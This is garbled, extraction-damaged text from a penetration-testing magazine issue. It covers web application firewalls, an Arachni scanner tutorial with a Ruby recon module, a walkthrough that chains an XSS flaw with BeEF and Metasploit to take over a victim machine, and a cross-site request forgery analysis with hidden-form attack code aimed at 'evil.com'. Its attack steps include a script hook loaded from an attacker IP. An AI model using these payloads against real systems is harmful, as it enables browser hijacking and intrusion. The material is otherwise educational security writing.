professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
The problem with more recent web applications Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic These include for example Ajax and JavaScript While the browser was originally only a passive tool for viewing web sites it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons But that makes the browser and its tools vulnerable The attackers gain access to the browser via infected web applications and as such to further systems and to their ownersrsquo or usersrsquo sensitive data
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data This is completely wrong The opposite is the case One single unsecured web application endangers the security of further systems that follow on such as application or database servers Equally wrong is the common misconception that the telecom providersrsquo security services would protect the data Providers are not responsible for a safe use of web applications regardless of where they are hosted Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications one which they often do not fulfill
they disclose sensitive data and make processes vulnerable But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications
As a result critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here Particularly in association with the web the security requirements for applications have a different focus and are much higher than for traditional network security The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher
While most companies in the meantime protect their networks to a relatively high standard the hackers have long since moved on to a different playing field They now take advantage of security loopholes in web applications There are several reasons for this Compared with the network level you donrsquot need to be highly skilled to use the internet This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications In addition the internet also offers many possibilities for concealment and making action anonymous As a result the risk for attackers remains relatively low and so does the inhibition threshold for hackers
Many web applications that are still active today were developed at a time when awareness for application security in the internet had not yet been raised There were hardly any threat scenarios because the attackersrsquo focus was directed at the internal IT structure of the companies In the first years of web usage in particular
Figure 1 This model (based on Everett M Rogers adoption curve from ldquoDiffusion of innovationsrdquo) shows a time lag between the adoption of new technology and the securing of the new technology Both exhibit the similar Technology Adoption Lifecycle There is an inection point when a technology becomes widely enough accepted and therefore economically relevant for hackers resulting in a period of Peak Vulnerability Bottom line Security is an afterthought
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under FireThe security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications For years now the major types have been
All injection attacks (such as SQL Injection Command Injection LDAP Injection Script Injection XPath Injection)
bull Cross Site Scripting (XSS)bull Hidden Field Tamperingbull Parameter Tamperingbull Cookie Poisoningbull Buffer Overflowbull Forceful Browsingbull Unauthorized access to web serversbull Search Engine Poisoning bull Social Engineering
The only more recent trend The attackers have recently started to combine the methods more often in order to obtain even higher success rates And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better Instead an increasing number of smaller companies are now in the crossfire
One ExampleAttackers know that a certain commercial software program is widely used for shopping carts in online shops and that the smaller companies rarely patch the weak points They launch automated attacks in order to identify ndash with high efficiency ndash as many worthwhile targets as possible in the web In this step they already gather the required data about the underlying software the operating system or the database from web applications which give away information freely The attackers then only have to evaluate this information As such they have an extensive basis for later targeted attacks
How to Make a Web Application SecureThere are two ways of actually securing the data and processes that are connected to web applications The first way would be to program each application absolutely error-free under the required application conditions and security aspects according to predefined guidelines Companies would have to increase the security of older web applications to the required standards later
However this intention is generally doomed to failure from the outset because the later integration of security functions in an existing application is in most cases not only difficult but also above all expensive Another example a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked It is then not sufficient to just add new functions The developers must start by precisely analyzing the program and then making deep inroads into its basic structures This is not only tedious but also harbors the danger of making mistakes Another example is programs that do not just use the session attributes for authentification In this case it is not straightforward to update the session ID after logging in This makes the application susceptible for Session Fixation
If existing web applications display weak spots ndash and the probability is relatively high ndash then it should be clarified whether it makes business sense to correct them It should not be forgotten here that other systems are put at risk by the unsecured application A risk analysis can bring clarity whether and to what extent the problems must be resolved or if further measures should be taken at the same time Often however the program developers are no longer available and training new developers as well as analyzing the web application results in additional costs
The situation is not much better with web applications that are to be developed from scratch There is no software program that ever went into productive operation free of errors or without weak spots The shortcomings are frequently uncovered over time And by this time correcting the errors is once again time-consuming and expensive In addition the application cannot be deactivated during this period if it works as a sales driver or as an important business process Despite this the demand for good code programming that sensibly combines effectiveness functionality and security still has top priority The safer a web application is written the lower the improvement work and the less complex the external security measures that have to be adopted
The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP) As such it represents a special case of Application-Level-Firewalls (ALF) or Application-Level-Gateways (ALG) In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
If you want to use the command-line interface just execute
$ arachni --help
A quick overview of the other screens (Figure 1)
bull Start a Scan start a scan by entering the URL and pressing Launch scan After a scan is launched the screen gives an overview of what issues are detected and how far the process is
bull Modules enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site-Scripting (XSS) SQL Injection (SQLi) Cross-Site-Request Forgery (CSRF) or detect hidden features or simply make lists of interesting items such as email addresses
bull Plugins plug-ins help to automate tasks Plug-ins are more powerful than modules and enable to script login sequences detect Web Application Firewalls (WAF) perform dictionary attacks hellip
bull Settings the settings screens allows to add cookies and headers limit the scan to certain directories hellip
bull Reports gives access to the scan reports Arachni creates reports in its own internal format and exports them to HTML XML or text
bull Add-ons three add-ons are installedbull Auto-deploy converts any SSH enabled Linux
box in an Arachni dispatcherbull Tutorial serves as an examplebull Scheduler schedules and run scan jobs at a
specific timebull Log overview of actions taken by the GUI
Your First ScanWe will use both the command-line and the GUI First the command-line start a scan with all modules active This is extremely easy
$ arachni httpwwwexamplecom --report =afroutfile=
wwwexamplecomafr
Afterwards the HTML report can be created by executing the following
$ arachni --repload=wwwexamplecomafr --report=html
outfile=wwwexamplecomhtml
Thatrsquos it Enabling or disabling modules is of course possible Execute the following command for more information about the possibilities of the command-line interface
$ arachni --help
Usually it is not necessary to include all recon modules Some modules will create a lot of requests making detection of your activities easier (if that is a problem with your assignment) and taking a lot more time to finish List all modules with the following command
$ arachni --lsmod
Enabling or disabling modules is easy use the --mods switch followed by a regular expression to include modules or exclude modules by prefixing the regular expression with a dash Example
$ arachni --mods= -xss_ httpwwwexamplecom
The above will load all modules except the module related with Cross-Site-Scripting (XSS)
Using the GUI makes this process even easier Open the GUI by browsing to httplocalhost4567 and accept the default dispatcher
Next steps are to verify the settings in the Settings Modules and Plugins screens Once you are satisfied proceed to the Start a Scan screen
If you want to run a scan against some test applications visit my blog for the list of deliberately vulnerable applications Most of these applications can be installed locally or can be attacked online (please read all related faqs and permissions before scanning a site In most jurisdictions this is illegal unless permission is explicitly granted by the owner)
After the scan just go the Reports screen and download the report in the format you wantFigure 2 Start a scan screen
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
Listing 3 Create your own module
=begin
Arachni
Copyright (c) 2010-2011 Tasos Zapotek Laskos
tasoslaskosgmailcom
This is free software you can copy and distribute
and modify
this program under the term of the GPL v20 License
(See LICENSE file for details)
=end
module Arachni
module Modules
Looks for common files on the server based on
wordlists generated from open
source repositories
More information about the SVNDigger wordlists
httpwwwmavitunasecuritycomblogsvn-digger-
better-lists-for-forced-browsing
The SVNDigger word lists were released under the GPL
v30 License
author Herman Stevens
see httpcwemitreorgdatadefinitions538html
class SvnDiggerDirs lt ArachniModuleBase
def initialize( page )
super( page )
end
def prepare
to keep track of the requests and not repeat them
__audited ||= Setnew
__directories ||=[]
return if __directoriesempty
read_file( all-dirstxt )
|file|
__directories ltlt file unless fileinclude( )
end
def run( )
path = get_path( pageurl )
return if __auditedinclude( path )
print_status( Scanning SVNDigger Dirs )
__directorieseach
|dirname|
url = path + dirname +
print_status( Checking for url )
log_remote_directory_if_exists( url )
|res|
print_ok( Found dirname at +
reseffective_url )
__audited ltlt path
def selfinfo
name =gt SVNDigger Dirs
description =gt qFinds directories
based on wordlists created from
open source repositories The
wordlist utilized by this module
will be vast and will add a consi
derable amount of
time to the overall scan time
author =gt Herman Stevens ltherman
stevensgmailcomgt
version =gt 01
references =gt
Mavituna Security =gt
httpwwwmavitunasecuritycom
blogsvn-digger-better-lists-for-
forced-browsing
OWASP Testing Guide =gt
httpswwwowasporgindexphp
Testing_for_Old_Backup_and_
Unreferenced_Files_(OWASP-CM-006)
targets =gt Generic =gt all
issue =gt
name =gt qA SVNDigger
directory was detected
description =gt q
tags =gt [ svndigger path
directory discovery ]
cwe =gt 538
severity =gt IssueSeverityINFORMATIONAL
cvssv2 =gt
remedy_guidance =gt Review these
resources manually Check if
unauthorized interfaces are exposed
or confidential information
remedy_code =gt
end
end
end
end
WEB APP VULNERABILITIES
Page 28 httppentestmagcom012011 (1) November
Create your Own ModuleArachni is very modular and can be easily extended In the following example we create a new reconnaissance module
Move into your Arachni source tree Yoursquoll find the modules directory In there yoursquoll find two directories audit and recon Move into the recon directory We will create our Ruby module
Arachni makes it real easy if your module needs external files it will search into a subdirectory with the same name Example if you create a svn_digger_dirsrb module this module is able to find external files in the modulesreconsvn_digger_dirs subdirectory
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing These wordlists are based on directories found in open source code repositories
If there is a directory that needed to be protected and you forget that it will be found by a scanner that uses these wordlists
Furthermore it can be used as a basis for reconnaissance if a directory or file is detected this might provide clues about what technology the site is using
Download the wordlists from the above URL Create a directory modulesreconsvn_digger_dirs and move the file all-dirstxt from the wordlist archive to the newly created directory
Create a copy of the file modulesreconcommon_
directoriesrb and name it svn_digger_dirsrb Change the code to read as follows Listing 3
The code does not need a lot of explanation it will check whether or not a specific directory exists if yes it will forward the name to the Arachni Trainer (who will include the directory in the further scans) as well as create a report entry for it
Note the above code as well as another module based on the SVNDigger wordlists with filenames are now part of the experimental Arachni code base
ConclusionWe used Arachni in many of our application vulnerability assessments The good points are
bull Highly scalable architecture just create more servers with dispatchers and share the load This makes the scanner a lot more responsive and fast
bull Highly extensible create your own modules plug-ins and even reports with ease
bull User-friendly start your scan in minutesbull Very good XSS and SQLi detection with very few
false positives There are false negatives but this
is usually caused by Arachni not detecting the links to be audited This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy
bull Excellent reporting capabilities with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE)
Arachni lacks support for the following
bull No AJAX and JSON supportbull No JavaScript support
This means that you need to help Arachni finding links hidden in JavaScript eg by using it as a proxy between your browser and the web application Yoursquoll need a different tool (or use your brain and manual tests) to check for AJAXJSON related vulnerabilities in the application you are testing
Arachni also cannot examine and decompile Flash components but a lot of tools are at hand to help you with that Arachni does not perform WAF (Web Application Firewall) evasion but then again this is not necessarily difficult to do manually for a skilled consultant or hacker
And why not write your own module or plug-in that implements the missing functionality Arachni is certainly a tool worth adding to your toolkit
HERMAN STEVENSAfter a career of 15 years spanning many roles (developer security product trainer information security consultant Payment Card Industry auditor application security consultant) Herman Stevens now works and lives in Singapore where he is the director of his company Astyran Pte Ltd (httpwwwastyrancom) Astyran specialises in application security such as penetration tests vulnerability assessments secure code reviews awareness training and security in the SDLC Contact Herman through email (hermanstevensgmailcom) or visit his blog (httpblogastyransg)
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
In most commercial penetration testing reports itrsquos sufficient to just show a small alert popup this is to show that a particular parameter is vulnerable to
an XSS attack However this is not how an attacker would function in the real world Sure hersquod use a pop up initially to find out which parameter is vulnerable to an XSS attack Once hersquos identified that though hersquoll look to steal information by executing malicious JavaScript or even gain total control of the userrsquos machine
In this article wersquoll look at how an attacker can gain complete control over a userrsquos browser ultimately taking over the userrsquos machine by using Beef (A browser exploitation framework)
A Simple POCTo start off though letrsquos do exactly what the attacker would do which is to identify a vulnerability For simplicityrsquos
sake wersquoll assume that the attacker has already identified a vulnerable parameter on a page Here are the relevant files which you too can use on your web server if you want to try this also
HTML Page
ltHTMLgt
ltBODYgt
ltFORM NAME=rdquotestrdquo action=rdquosearch1phprdquo method=rdquoGETrdquogt
Search ltINPUT TYPE=rdquotextrdquo name=rdquosearchrdquogtltINPUTgt
ltINPUT TYPE=rdquosubmitrdquo name=rdquoSubmitrdquo value=SubmitgtltINPUTgt
ltFORMgt
ltBODYgt
ltHTMLgt
XSS Beef Metaspoilt Exploitation
Figure 2 BeeF after conguration
Cross Site scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code on the victimrsquos browser The impact of an XSS attack is only limited by the potency of the attackerrsquos JavaScript code
Figure 1 User enters in a search box
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
and click a few buttons to configure it Alternatively you could use a distribution like Backtrack which already has BeeF installed Here is a screenshot of how BeeF looks after it is configured (Figure 2)
Instead of the user clicking on a link which will generate a popup box the user will instead be tricked to click on a link which tells his browser to connect to the BeeF controller The URL that the user has to click on is
httplocalhostsearch1phpsearch=ltscript src=
rsquohttp19216856101beefhookbeefmagicjsphprsquogt
ltscriptgtampSubmit=Submit
The IP address here is the one on which you have BeeF running Once the user clicks on the link above you should see an entry in the BeeF controller window showing that a Zombie has connected You can see this in the Log section on the right hand side or the Zombie section on the left hand side Here is a screenshot which shows that a browser has connected to the Beef controller (Figure 3)
Click and highlight the zombie in the left pane and then click on Standard Modules ndash Alert Dialog This will result in a little popup box popping up on the victim machine Herersquos a screenshot which shows the same (Figure 4) And this is what the victim will see (Figure 5)
So as you can see because of Beef even an unskilled attacker can run code which he does not even understand on the victimrsquos machine and steal sensitive data Hence it becomes all the more
Server Side PHP Code
ltphp
$a=$_GET[lsquosearchrsquo]
echo bdquoThe parameter passed is $ardquo
gt
As you can see itrsquos some very simple code where the user enters something in a search box on the first page his input is sent to the server which reads the value of the parameter and prints it on to the screen So instead of a simple text input the attack enters a simple JavaScript into the box the JavaScript will execute on the userrsquos machine and not get displayed The user hence has to just been tricked into clicking on a link httplocalhostsearch1phpsearch=ltscriptgtalert(documentdomain)ltscriptgt
The screenshot below clarifies the above steps (Figure 1)
Beef ndash Hook the userrsquos browserNow while this example is sufficient to prove that the site is vulnerable to XSS itrsquos most certainly not what an attacker will stop at An attacker will use a tool like BeeF (Browser Exploitation Framework) to gain more control of the userrsquos browser and machine
I used an older version of Beef(032) as I just wanted to demonstrate what you can do with such a tool The newer version has been rewritten completely and has many more features For now though extract Beef from the tarball and copy it into your web server directory
Figure 3 Connection with BeeF controller
Figure 4 What attacer will see
Figure 5 What victim will see
Figure 6 Defacing the current Web Page
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
important to protect against XSS Wersquoll have a small section right at the end where I briefly tell you how to mitigate XSS
Irsquoll quickly discuss a few more examples using Beef before we move on to using it as a platform for other attacks Here are the screenshots for the same these are all a result of clicking on the various modules available under the Standard Modules menu
Defacing the Current Web PageThis results in the webpage being rewritten on the victim browser with the text in the lsquoDEFACE STRINGrsquo box Try it out (Figure 6)
Detect all Plugins on the Userrsquos BrowserThere are plenty of other plug-ins inside Beef under the Standard Modules and Browser modules tab which you can try out for yourself I wonrsquot discuss all of them here as the principle is the same What I want to do now though is use the userrsquos hooked Browser to take complete control of the userrsquos machine itself (Figure 7)
Integrate Beef with Metasploit and get a shellEdit Beefrsquos configuration files so that it can directly talk to Metasploit All I had to edit was msfphp to set the correct IP address Once this is done you can launch Metasploitrsquos browser based exploits from inside Beef
Figure 7 Detecting plugins on the user browser
Figure 8 startin Metaslpoit
Figure 9 bdquoJobsrdquo command
Figure 10 Metasploit after clicking bdquoSend Nowrdquo
Figure 11 Meterpreter window - screenshot 1
Figure 12 Meterpreter window - screenshot 2
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
Now first ensure that the Zombie is still connected Then click on Standard modules ndash Browser Exploit and configure the exploit as per the screenshot below Wersquore basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8)
Open a shell and run msfconsole to start metasploit Once you see the msfgt prompt click the zombie in the browser and click the Send Now button to send the exploit payload to the victim You can immediately check if Beef can talk to Metasploit by running the jobs command (Figure 9)
If the victimrsquos browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit) it will connect back to the running Metasploit instance Herersquos what you see in Metasploit a while after you click Send Now (Figure 10)
Once yoursquove got a prompt yoursquore on that remote system and can do anything that you want with the privileges of that user Here are a few more screenshots of what you can do with Meterpreter The screenshots are self explanatory so I wonrsquot say much (Figure 11-13)
The user was apparently logged in with admin privileges and we could create a user by the name dennis on the remote machine At this point of time we have complete control over 1 machine
Once we have control over this machine we can use FTP or HTTP and download various other tools like Nmap Nessus a sniffer to capture all keystrokes on this machine or even another copy of Metasploit and install these on this machine We can then use these to port scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network Eventually over a period of time it is potentially possible to compromise every machine on that network
MitigationTo mitigate XSS one must do the following
Figure 13 Meterpreter window - screenshot 3
bull Make a list of parameters whose values depend on user input and whose resultant values after they are processed by application code are reflected in the userrsquos browser
bull All such output as in a) must be encoded before displaying it to the user The OWASP XSS prevention cheatsheet is a good guide for the same
bull White List and Black list filtering can also be used to completely disallow specific characters in user input fields
ConclusionIn a nutshell we can conclude that if even a single parameter is vulnerable to XSS it can result in the complete compromise of that userrsquos machine If the XSS is persistent then the number of users that could potentially be in trouble increases So while XSS does involve some kind of user input like clicking a link or visiting a page it is still a high risk vulnerability and must be mitigated throughout every application
ARVIND DORAISWAMYArvind Doraiswamy is an Information Security Professional with 6 years of experience in SystemNetwork and Web Application Penetration testing In addition he freelances in information security audits trainings and product development [Perl Ruby on Rails] while spending a lot of time learning more about malware analysis and reverse engineering Email ndash arvinddoraiswamygmailcomLinked In ndash httpwwwlinkedincompubarvind-doraiswamy39b21332Other writings ndash httpresourcesinfosecinstitutecomauthorarvind AND httpardsecblogspotcom
Referencesbull httpwwwtechnicalinfonetpapersCSShtmlbull httpswwwowasporgindexphpCross-site_Scripting_
28XSS29bull httpswwwowasporgindexphpXSS_28Cross_Site_
Scripting29_Prevention_Cheat_Sheetbull httpbeefprojectcom
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
In simple words when an evil website posts a new status to your Twitter account while your Twitter login session is still active
Csrf BasicsA simple example of this is the following hidden HTML code inside the evilcom webpage
ltimg src=rdquohttptwittercomhomestatus=evilcomrdquo
style=rdquodisplaynonerdquogt
Many web developers use POST instead of GET requests to avoid this kind of a malicious attack But this
approach is useless as shown by the following HTML code used to bypass that kind of a protection (Listing 1)
Usless DefensesThe following are the weak defenses
Only accept POST This stops simple link-based attacks (IMG frames etc) but hidden POST requests can be created within frames scripts etc
Referrer checking Some users prohibit referrers so you cannot just require referrer headers Techniques to selectively create HTTP request without referrers exist
Requiring multiStep transactions CSRF attacks can perform each step in order
DefenseThe approach used by many web developers is the CAPTCHA systems and one- time tokens CAPTCHA systems are widely used by asking a user to fill the text in the CAPTCHA image every time the user submits a form might make them stop visiting your website This is why web sites use one-time tokens Unlike the CAPTCHA system one-time tokens are unique values stored in a
Cross-site Request ForgeryIN-DEPTH ANALYSIS bull CYBER GATES bull 2011
Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of the authorized users
Listing 1 HTML code used to bypass protection
ltdiv style=displaynonegt
ltiframe name=hiddenFramegtltiframegt
ltform name=Form action=httpsitecompostphp
target=hiddenFrame
method=POSTgt
ltinput type=text name=message value=I like
wwwevilcom gt
ltinput type=submit gt
ltformgt
ltscriptgtdocumentFormsubmit()ltscriptgt
ltdivgt
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
indexphp(Victim website)
And the webpage which processes the request and stores the message only if the given token is correct
postphp(Victim website)
In-depth AnalysisIn-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token The following is a real scenarioListing 4
indexphp(Evil website)
For security reasons the same origin policy in browsers restricts access of browser-side program-ming languages such as JavaScript to access a remote content and the browser throws the following exception
Permission denied to access property lsquodocumentrsquo
var token = windowframes[0]documentforms[lsquomessageFormrsquo]
tokenvalue
Browserrsquos settings are not hard to modify So the best way for web application security is to secure web application itself
Frame BustingThe best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens FrameKillers are small piece of Javascript code used to protect web pages from being framed
ltscript type=rdquotextjavascriptrdquogt
if(top = self) toplocationreplace(location)
ltscriptgt
It consists of Conditional statement and Counter-action
statement
Common conditional statements are the following
if (top = self)
if (toplocation = selflocation)
if (toplocation = location)
if (parentframeslength gt 0)
if (window = top)
if (windowtop == windowself)
if (windowself = windowtop)
if (parent ampamp parent = window)
if (parent ampamp parentframes ampamp parentframeslengthgt0)
if((selfparentampamp(selfparent===self))ampamp(selfparentfr
ameslength=0))
webpage formrsquos hidden field and in a session at the same time to compare them after the page form submission
Mechanisms used to subvert one-time tokens is usually accomplished by brute force attacks Brute forcing attacks against one-time tokens is useful only if the mechanism is widely used by web developers For example the following PHP code
ltphp
$token = md5(uniqid(rand() TRUE))
$_SESSION[lsquotokenrsquo] = $token
gt
Defense Using One-time TokensTo understand better how this system works letrsquos take a look to a simple webpage which has a form with one-time token Listing 2
Listing 2 Wrong token
ltphp session_start()gt
lthtmlgt
ltheadgt
lttitlegtGOODCOMlttitlegt
ltheadgt
ltbodygt
ltphp
$token = md5(uniqid(rand()true))
$_SESSION[token] = $token
gt
ltform name=messageForm action=postphp method=POSTgt
ltinput type=text name=messagegt
ltinput type=submit value=Postgt
ltinput type=hidden name=token value=ltphp echo $tokengtgt
ltformgt
ltbodygt
lthtmlgt
Listing 3 Correct token
ltphp
session_start()
